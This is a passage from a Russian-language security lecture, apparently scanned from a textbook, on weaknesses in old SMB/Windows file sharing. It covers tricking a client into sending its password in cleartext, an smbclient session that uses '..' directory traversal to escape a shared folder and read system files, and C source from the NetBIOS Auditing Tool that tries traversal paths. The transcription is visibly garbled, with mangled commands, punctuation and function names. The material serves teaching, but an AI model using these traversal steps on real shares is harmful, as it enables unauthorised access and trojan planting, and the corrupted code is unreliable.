Лекция: Атаке, как указание клиенту передавать пароль в открытом виде, потому что
Сервер якобы не поддерживает зашифрованные пароли. Естественно, роль
Сервера здесь выполняет ложный сервер злоумышленника (см. главу 3).
Из-за поддержки устаревших с точки зрения безопасности сетевых решений SMB
Может быть подвержен атаке на получение доступа ко всему диску, если у
Злоумышленника есть права только на его часть (каталог). Для этого
взломщику достаточно указать имя каталога через ".." $snibclient
\\\\VICTIM\\SOME_DIR -n TRUSTME -m LANMAN2 -U HACKER -1 194.94.94.94
smb: \" dir suit): \" cd. .
smb: \. .\" dir
smb: \..\«cd \..\..
smb:\..\..\»dir
smb: \. .\. .\" get config.sys -
smb; \..\..\" cd windows
smb: \. .\. .\windows\"
Далее злоумышленник может поместить в системный каталог Windows, например,
«троянского» коня. Первоначальная реакция Microsoft: «Samba -это
неправильный клиент, и он не должен быть использован».
Аналогичные попытки делает и NAT (NetBIOS Auditing Tool) -
Распространенное средство анализа безопасности для Windows-сетей. Вот
фрагмент его исходного текста:
strcpy(cur_dir, "..\\*.*"):
Do_dir (inbuf, outbuf, cur_dir, fattr, cfflp_stash, False);
tested_stash = 0:
strcpy(cur_dir, "\\..\\*.*");
do_dir (inbuf, outbuf, cur_dir, fattr, cmp_stash, False):
tested_stash = 0;
strepy (cur_dir, "...\\*.*"),
Do_dir (inbuf, outbuf, cur_dir, fattr, cmp_stash, False);
tested_stash = 0;
strcpy (cur_dir, ".\\… .\\*. *");